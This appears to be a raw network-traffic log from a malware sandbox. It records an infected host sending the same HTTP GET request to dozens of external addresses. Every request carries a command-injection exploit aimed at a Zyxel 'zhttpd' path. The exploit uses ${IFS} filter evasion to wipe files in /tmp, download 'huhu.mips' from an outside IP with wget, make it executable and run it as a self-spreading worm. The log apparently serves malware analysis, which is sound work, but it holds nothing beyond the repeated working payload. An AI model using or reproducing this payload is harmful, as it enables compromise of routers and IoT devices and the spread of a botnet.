                                                  Jan 19, 2024 18:23:45.850341082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2095192.168.2.133571660.133.131.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850398064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2096192.168.2.1358152130.182.133.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850434065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2097192.168.2.133304667.204.212.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850493908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2098192.168.2.1353916204.99.55.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850526094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2099192.168.2.134703097.150.225.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850552082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2100192.168.2.1333624203.72.240.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850583076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2101192.168.2.1358010169.112.228.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850622892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2102192.168.2.1336668187.74.159.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850661993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2103192.168.2.1352390199.126.119.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850697994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2104192.168.2.135154458.109.242.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850740910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2105192.168.2.1355330177.212.255.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850755930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2106192.168.2.135472251.33.44.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850821018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2107192.168.2.1358450182.84.241.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850871086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2108192.168.2.133993681.251.186.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850928068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2109192.168.2.1344394162.150.52.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.850965977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2110192.168.2.1360348164.47.253.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851001978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2111192.168.2.1337600216.64.21.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851057053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2112192.168.2.1341108144.7.217.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851073980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2113192.168.2.1355596169.99.177.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851128101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2114192.168.2.135326824.205.129.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851150990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2115192.168.2.133785891.77.188.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851193905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2116192.168.2.1334588135.101.49.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851239920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2117192.168.2.1351024188.253.154.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851264954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2118192.168.2.1338168135.217.139.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851303101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2119192.168.2.134156445.11.177.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851362944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2120192.168.2.1348594163.106.53.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851372004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2121192.168.2.136040235.211.239.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851435900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2122192.168.2.135394465.39.50.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851464987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2123192.168.2.1338556128.160.33.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:45.851480007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2124192.168.2.135833886.177.156.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.863769054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2125192.168.2.135587419.153.125.147443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.863802910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2126192.168.2.136071490.223.21.36443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.863873959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2127192.168.2.1358852173.65.52.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.863878012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2128192.168.2.1356882137.211.158.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.863919020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2129192.168.2.1334866191.143.54.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.863950968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2130192.168.2.134394678.78.74.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.863995075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2131192.168.2.1346768199.124.134.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864016056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2132192.168.2.1354932155.191.83.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864084005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2133192.168.2.1355902166.117.114.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864121914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2134192.168.2.1350108129.171.214.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864140987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2135192.168.2.1352274203.236.196.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864197969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2136192.168.2.1335800158.14.236.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864219904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2137192.168.2.136082884.205.169.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864279985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2138192.168.2.13593321.126.120.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864341974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2139192.168.2.1347078123.44.140.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864373922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2140192.168.2.133342296.160.107.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864435911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2141192.168.2.1358472192.45.163.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864481926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2142192.168.2.1336802179.172.176.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864526033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2143192.168.2.1350022167.12.137.170443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864557981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2144192.168.2.1350608197.82.37.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864613056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2145192.168.2.1358822191.193.15.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864656925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2146192.168.2.1348744220.255.197.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864702940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2147192.168.2.135206873.8.132.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864752054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2148192.168.2.133295451.16.177.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864794016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2149192.168.2.1352768178.186.92.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864847898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2150192.168.2.13366469.224.13.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864905119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2151192.168.2.1345904201.80.20.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864957094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2152192.168.2.1338130151.4.235.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.864985943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2153192.168.2.1357082132.163.76.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865040064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2154192.168.2.1345040118.104.39.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865083933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2155192.168.2.1354270134.32.46.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865119934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2156192.168.2.135870882.206.131.64443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:46.865159035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2157192.168.2.134011669.39.72.144443
                                                  TimestampBytes transferredDirectionData
